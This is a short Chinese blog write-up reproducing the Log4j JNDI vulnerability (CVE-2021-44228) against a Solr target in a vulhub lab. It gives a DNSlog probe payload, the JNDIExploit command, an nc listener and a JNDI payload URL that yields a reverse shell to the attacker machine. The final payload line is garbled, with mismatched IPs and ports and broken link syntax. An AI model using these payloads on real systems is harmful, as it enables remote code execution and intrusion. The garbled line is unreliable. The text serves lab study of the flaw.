196 字
1 分钟
Log4J反序列化
2023-04-11

环境:
/root/CVE/vulhub-master/log4j/CVE-2021-44228
Kali系统一个——需nc 来监听端口信息,作为攻击机
本机:中转机
centOS:靶机

地址信息:
靶机IP:192.168.1.4:8983
本机IP:192.168.1.2
攻击机:192.168.91.131

开启靶机环境
image.png
请求一个DNS域名
http://dnslog.cn/
image.png
域名:
gswq4u.dnslog.cn
打开hackbar,先点一下loadURL
image.png

将资料中提供的地址,复制
image.png
将后面的域名,改为刚刚申请的
gswq4u.dnslog.cn
http://192.168.1.4:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.f6pnnm.dnslog.cn}
点击执行,出现下面页面
image.png

这里获得了反馈
image.png
现在打开JNDIExploit-1.2,
输入指令
java -jar .\JNDIExploit-1.2-SNAPSHOT.jar -i 本机IP
image.png
然后在攻击机,打开端口监听
命令:
nc -lvp 4444

在hackbar构建如下命令、
[http://192.168.91.132:8983/solr/admin/cores?action=jndi:ldap://192.168.1.2:1389/Basic/ReverseShell/192.168.91.131/1234](http://192.168.0.112:8983/solr/admin/cores?action={jndi:ldap://192.168.1.2:1389/Basic/ReverseShell/192.168.91.131/1234}](http://192.168.0.112:8983/solr/admin/cores?action={jndi:ldap://192.168.0.108:1389/Basic/ReverseShell/192.168.0.111/4444})
点击Execute
image.png
发现监听的端口返回了shell
image.png
到此复现完成

Log4J反序列化
https://mizuki.mysqil.com/posts/网安/log4j反序列化/
作者
Twoc-Prime
发布于
2023-04-11
许可协议
CC BY-NC-SA 4.0

部分信息可能已经过时